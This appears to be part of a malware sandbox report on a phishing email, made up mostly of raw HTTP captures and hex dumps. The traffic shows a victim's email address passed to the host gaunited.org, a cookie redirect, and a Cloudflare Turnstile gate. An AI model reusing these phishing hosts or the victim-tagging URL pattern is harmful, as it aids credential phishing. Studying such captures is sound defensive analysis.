2024-07-09 18:52:12 UTC	1369	IN	Data Raw: 31 43 25 30 44 25 30 38 25 31 37 25 30 33 25 30 35 25 30 31 41 25 30 32 25 30 34 2f 32 42 43 25 31 34 25 31 33 25 30 43 25 31 37 25 31 45 25 31 31 25 30 34 4a 25 30 38 25 31 31 25 33 45 2c 43 4a 41 3f 3b 25 30 34 38 4b 42 48 2b 3b 25 30 37 24 41 4a 40 26 25 30 38 25 31 46 25 33 45 49 40 48 25 30 38 25 30 41 2c 39 47 48 25 31 34 25 30 35 25 31 45 25 30 44 25 30 39 25 31 45 25 30 36 25 30 45 25 30 37 43 26 25 30 42 2d 3b 47 48 25 31 32 25 31 31 25 30 45 25 31 37 25 31 46 25 31 38 25 30 31 41 41 32 3a 25 30 34 2d 42 46 48 42 4b 25 30 30 2e 3a 3a 47 48 40 25 31 45 25 30 44 25 31 36 25 30 34 25 30 39 25 31 42 25 30 38 25 30 36 25 30 44 4b 25 30 34 25 30 45 25 31 32 25 33 45 49 40 25 31 38 25 31 39 25 30 36 25 31 45 25 31 46 25 31 44 25 30 46 49 4b 30 25 33 45 Data Ascii: 1C%0D%08%17%03%05%01A%02%04/2BC%14%13%0C%17%1E%11%04J%08%11%3E,CJA?;%048KBH+;%07$AJ@&%08%1F%3EI@H%08%0A,9GH%14%05%1E%0D%09%1E%06%0E%07C&%0B-;GH%12%11%0E%17%1F%18%01AA2:%04-BFHBK%00.::GH@%1E%0D%16%04%09%1B%08%06%0DK%04%0E%12%3EI@%18%19%06%1E%1F%1D%0FIK0%3E
2024-07-09 18:52:12 UTC	1369	IN	Data Raw: 59 53 25 35 44 25 35 43 25 35 43 56 40 58 25 33 45 2f 3b 24 52 49 59 25 31 42 25 35 43 56 25 30 38 25 30 39 25 30 42 50 25 35 43 4e 25 35 42 2c 25 35 44 58 59 56 25 35 44 55 5f 51 5f 43 54 25 30 33 25 31 42 25 30 36 25 30 41 25 30 38 51 25 30 39 25 30 45 25 31 32 25 30 43 43 43 53 25 30 35 25 35 43 5f 51 25 35 42 52 58 46 25 35 43 5f 5a 56 25 35 42 4a 51 25 31 30 21 24 21 25 35 43 25 33 43 2f 3a 2d 56 33 25 32 30 36 5c 27 38 32 25 31 36 25 30 30 24 32 25 35 45 41 55 53 55 52 25 35 43 42 51 25 30 36 51 25 35 42 55 5a 5f 25 35 43 48 53 4b 25 35 42 25 31 42 25 35 42 25 35 42 25 35 44 55 51 4e 25 35 42 25 30 43 58 25 35 42 25 35 45 51 25 35 44 57 42 58 25 30 38 25 31 38 25 30 41 25 30 30 25 30 32 58 25 30 38 25 30 32 25 31 39 25 30 46 4f 49 59 2c 5a 57 25 35 Data Ascii: YS%5D%5C%5CV@X%3E/;$RIY%1B%5CV%08%09%0BP%5CN%5B,%5DXYV%5DU_Q_CT%03%1B%06%0A%08Q%09%0E%12%0CCCS%05%5C_Q%5BRXF%5C_ZV%5BJQ%10!$!%5C%3C/:-V3%206\'82%16%00$2%5EAUSUR%5CBQ%06Q%5BUZ_%5CHSK%5B%1B%5B%5B%5DUQN%5B%0CX%5B%5EQ%5DWBX%08%18%0A%00%02X%08%02%19%0FOIY,ZW%5
2024-07-09 18:52:12 UTC	1369	IN	Data Raw: 37 25 30 30 25 31 46 25 30 41 25 30 35 25 30 34 47 48 25 31 32 25 31 31 25 30 45 25 31 37 25 31 46 25 31 38 25 30 31 41 41 53 25 31 33 54 5f 25 30 38 25 30 43 25 30 35 58 56 46 53 25 32 35 25 35 44 25 35 44 57 25 35 45 57 25 35 44 57 58 5f 46 25 31 43 52 25 30 35 25 31 45 25 30 44 25 30 39 25 31 45 25 30 36 25 30 45 25 30 37 43 25 31 38 25 30 36 28 25 32 35 47 2c 33 25 31 31 24 4a 25 31 31 25 31 38 25 30 41 25 31 35 25 31 43 25 31 31 25 30 35 43 25 31 39 25 31 42 25 30 45 2f 32 2e 31 25 31 31 25 32 35 37 54 25 31 43 25 30 46 25 31 36 25 30 35 25 30 30 25 31 45 25 30 33 25 30 30 25 30 46 49 25 30 43 25 30 39 25 31 35 25 32 35 42 46 25 31 41 25 31 42 25 30 36 25 31 46 25 31 36 25 31 38 25 30 34 4f 25 31 36 33 25 31 30 26 4b 43 41 25 30 34 38 25 30 36 2c 43 Data Ascii: 7%00%1F%0A%05%04GH%12%11%0E%17%1F%18%01AAS%13T_%08%0C%05XVFS%25%5D%5DW%5EW%5DWX_F%1CR%05%1E%0D%09%1E%06%0E%07C%18%06(%25G,3%11$J%11%18%0A%15%1C%11%05C%19%1B%0E/2.1%11%257T%1C%0F%16%05%00%1E%03%00%0FI%0C%09%15%25BF%1A%1B%06%1F%16%18%04O%163%10&KCA%048%06,C
2024-07-09 18:52:12 UTC	1369	IN	Data Raw: 30 25 31 46 25 30 41 25 30 35 25 30 34 4f 25 32 30 25 30 32 2d 24 4b 43 25 31 31 25 31 44 25 30 34 25 31 44 25 31 36 25 31 39 25 30 44 4a 2b 36 25 30 46 38 4b 42 48 25 31 44 25 30 32 5c 27 2e 41 4a 40 2a 25 30 33 26 25 32 32 49 40 48 2e 25 30 31 25 31 46 3b 47 48 42 25 30 30 25 30 32 25 32 35 39 42 46 25 31 43 25 30 46 25 31 36 25 30 35 25 30 30 25 31 45 25 30 33 25 30 30 25 30 46 49 36 25 30 44 26 25 32 35 42 46 25 31 41 25 31 42 25 30 36 25 31 46 25 31 36 25 31 38 25 30 34 4f 25 31 32 25 30 34 33 3a 4b 43 41 2e 38 25 31 46 24 43 4a 41 25 30 31 25 30 34 2e 24 4b 42 48 2f 25 30 38 25 31 41 30 41 4a 40 25 32 32 33 25 31 43 28 49 40 48 25 32 32 24 25 32 30 25 32 30 47 48 42 25 30 43 3b 35 3a 42 46 25 31 43 25 31 33 2d 25 30 30 25 31 30 25 30 38 44 25 30 43 Data Ascii: 0%1F%0A%05%04O%20%02-$KC%11%1D%04%1D%16%19%0DJ+6%0F8KBH%1D%02\'.AJ@*%03&%22I@H.%01%1F;GHB%00%02%259BF%1C%0F%16%05%00%1E%03%00%0FI6%0D&%25BF%1A%1B%06%1F%16%18%04O%12%043:KCA.8%1F$CJA%01%04.$KBH/%08%1A0AJ@%223%1C(I@H%22$%20%20GHB%0C;5:BF%1C%13-%00%10%08D%0C

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:13 UTC	708	OUT	GET /?xhjvrczy&email=chigley@live-quinn.com HTTP/1.1 Host: gaunited.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://viptim.ro/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:13 UTC	451	IN	HTTP/1.1 302 Found Set-Cookie: qPdM=6EHt3yYYhEzf; path=/; samesite=none; secure; httponly Set-Cookie: qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; path=/; samesite=none; secure; httponly location: /?xhjvrczy=7916a6b310ba6eced760b22d1d46271e3b1540bdd0cf0f26568259caa28bcc2cc4a34477ba1ecd9bb18135b16dc936bdbe30f9b85e8f3a82522031c68449ab57&email=chigley%40live-quinn.com Date: Tue, 09 Jul 2024 18:52:13 GMT Connection: close Transfer-Encoding: chunked
2024-07-09 18:52:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:13 UTC	904	OUT	GET /?xhjvrczy=7916a6b310ba6eced760b22d1d46271e3b1540bdd0cf0f26568259caa28bcc2cc4a34477ba1ecd9bb18135b16dc936bdbe30f9b85e8f3a82522031c68449ab57&email=chigley%40live-quinn.com HTTP/1.1 Host: gaunited.org Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://viptim.ro/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc
2024-07-09 18:52:14 UTC	142	IN	HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Date: Tue, 09 Jul 2024 18:52:14 GMT Connection: close Transfer-Encoding: chunked
2024-07-09 18:52:14 UTC	3271	IN	Data Raw: 63 62 62 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 0a 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d Data Ascii: cbb<!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:14 UTC	571	OUT	GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://gaunited.org/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:14 UTC	336	IN	HTTP/1.1 302 Found Date: Tue, 09 Jul 2024 18:52:14 GMT Content-Length: 0 Connection: close access-control-allow-origin: * cache-control: max-age=300, public cross-origin-resource-policy: cross-origin location: /turnstile/v0/b/191f93ebdf8e/api.js Server: cloudflare CF-RAY: 8a0a82901e3942f4-EWR alt-svc: h3=":443"; ma=86400

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report July2024.eml

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bin

C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-journal

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-shm

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-wal

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{36F80BB7-642B-4BA9-8822-A4A1F086C932}.tmp

C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1720551104642143000_12907092-E17E-45E0-B755-B17162A540FA.log

C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1720551104643269800_12907092-E17E-45E0-B755-B17162A540FA.log

C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240709T1451440409-2292.etl

C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

C:\Users\user\AppData\Roaming\Microsoft\Outlook\NoEmail.srs

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Windows Analysis Report
July2024.eml

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:15 UTC	555	OUT	GET /turnstile/v0/b/191f93ebdf8e/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://gaunited.org/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:15 UTC	408	IN	HTTP/1.1 200 OK Date: Tue, 09 Jul 2024 18:52:15 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 43538 Connection: close accept-ranges: bytes last-modified: Wed, 03 Jul 2024 15:18:30 GMT cache-control: max-age=31536000 access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 8a0a8293c81d422b-EWR alt-svc: h3=":443"; ma=86400
2024-07-09 18:52:15 UTC	961	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 53 74 28 65 2c 6e 2c 72 2c 6f 2c 63 2c 75 2c 79 29 7b 74 72 79 7b 76 61 72 20 5f 3d 65 5b 75 5d 28 79 29 2c 67 3d 5f 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 6c 29 7b 72 28 6c 29 3b 72 65 74 75 72 6e 7d 5f 2e 64 6f 6e 65 3f 6e 28 67 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 67 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 49 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 72 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 6e 2c 72 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function St(e,n,r,o,c,u,y){try{var _=e[u](y),g=_.value}catch(l){r(l);return}_.done?n(g):Promise.resolve(g).then(o,c)}function It(e){return function(){var n=this,r=arguments;return new Promise(function(o,c){var u=e.apply(n,r);funct
2024-07-09 18:52:15 UTC	1369	IN	Data Raw: 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 6e 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6f 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 41 74 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 6e 21 3d 6e 75 6c 6c 3f 6e 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 Data Ascii: tySymbols){var o=Object.getOwnPropertySymbols(e);n&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),r.push.apply(r,o)}return r}function At(e,n){return n=n!=null?n:{},Object.getOwnPropertyDescriptors?Object.definePropertie
2024-07-09 18:52:15 UTC	1369	IN	Data Raw: 28 65 2c 6e 29 7c 7c 4e 74 28 65 2c 6e 29 7c 7c 43 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 52 65 28 65 2c 6e 29 7b 76 61 72 20 72 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30 5d 26 31 29 74 68 72 6f 77 20 75 5b 31 5d 3b 72 65 74 75 72 6e 20 75 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 6f 2c 63 2c 75 2c 79 3b 72 65 74 75 72 6e 20 79 3d 7b 6e Data Ascii: (e,n)\|\|Nt(e,n)\|\|Ct()}function N(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Re(e,n){var r={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,y;return y={n
2024-07-09 18:52:15 UTC	1369	IN	Data Raw: 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 4c 74 3d 33 30 30 30 32 30 3b 76 61 72 20 4f 65 3d 33 30 30 30 33 30 3b 76 61 72 20 7a 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c 65 2e 4e 4f 4e 5f 49 4e 54 45 52 41 43 54 49 56 45 3d 22 6e 6f 6e 2d 69 6e 74 65 72 61 63 74 69 76 65 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45 Data Ascii: enges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Lt=300020;var Oe=300030;var z;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE
2024-07-09 18:52:15 UTC	1369	IN	Data Raw: 7a 30 2d 39 5f 2d 5d 7b 30 2c 33 32 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 79 72 2e 74 65 73 74 28 65 29 7d 76 61 72 20 68 72 3d 2f 5e 5b 61 2d 7a 30 2d 39 5f 5c 2d 3d 5d 7b 30 2c 32 35 35 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 72 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 68 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 29 7b 72 65 74 75 72 6e 20 6b 28 5b 22 6e 6f 72 6d 61 6c 22 2c 22 63 6f 6d 70 61 63 74 22 2c 22 69 6e 76 69 73 69 62 6c 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 61 74 28 Data Ascii: z0-9_-]{0,32}$/i;function tt(e){return e===void 0?!0:typeof e=="string"&&yr.test(e)}var hr=/^[a-z0-9_\-=]{0,255}$/i;function rt(e){return e===void 0?!0:typeof e=="string"&&hr.test(e)}function nt(e){return k(["normal","compact","invisible"],e)}function at(
2024-07-09 18:52:15 UTC	1369	IN	Data Raw: 29 3a 22 22 3b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 5f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 67 2c 22 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76 32 2f 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6c 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 Data Ascii: ):"";return"".concat(_,"/cdn-cgi/challenge-platform/").concat(g,"turnstile/if/ov2/av0/rcv").concat(o,"/").concat(e,"/").concat(n,"/").concat(r.theme,"/").concat(r.size,"/").concat(r.language,"/").concat(l)}function ke(e){if(e===void 0)throw new ReferenceE
2024-07-09 18:52:15 UTC	1369	IN	Data Raw: 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 4d 65 28 65 29 7b 76 61 72 20 6e 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 4d 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 51 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 6e 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 Data Ascii: tive code]")!==-1}function Me(e){var n=typeof Map=="function"?new Map:void 0;return Me=function(o){if(o===null\|\|!Qt(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof n!="undefined"){if(
2024-07-09 18:52:15 UTC	1369	IN	Data Raw: 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 5a 74 28 29 7b 76 61 72 20 65 3d 70 74 28 29 3b 65 7c 7c 70 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 6e 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 6e 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 72 3d 65 2e 73 Data Ascii: (c,HTMLScriptElement)&&e.test(c.src))return c}function Zt(){var e=pt();e\|\|p("Could not find Turnstile script tag, some features may not be available",43777);var n={loadedAsync:!1,params:new URLSearchParams};(e.async\|\|e.defer)&&(n.loadedAsync=!0);var r=e.s
2024-07-09 18:52:15 UTC	1369	IN	Data Raw: 3d 3d 6e 75 6c 6c 26 26 55 21 3d 3d 76 6f 69 64 20 30 3f 55 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 34 38 30 70 78 22 3a 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 34 36 30 70 78 22 2c 67 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 67 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 32 30 22 2c 67 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 31 70 78 22 2c 67 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 43 6f 6c 6f 72 3d 22 23 30 30 30 22 2c 67 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 53 74 79 6c 65 3d 22 73 6f 6c 69 64 22 2c 67 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 67 Data Ascii: ==null&&U!==void 0?U:"nonexistent")?g.style.height="480px":g.style.height="460px",g.style.position="absolute",g.style.zIndex="21474836420",g.style.borderWidth="1px",g.style.borderColor="#000",g.style.borderStyle="solid",g.style.backgroundColor="#ffffff",g
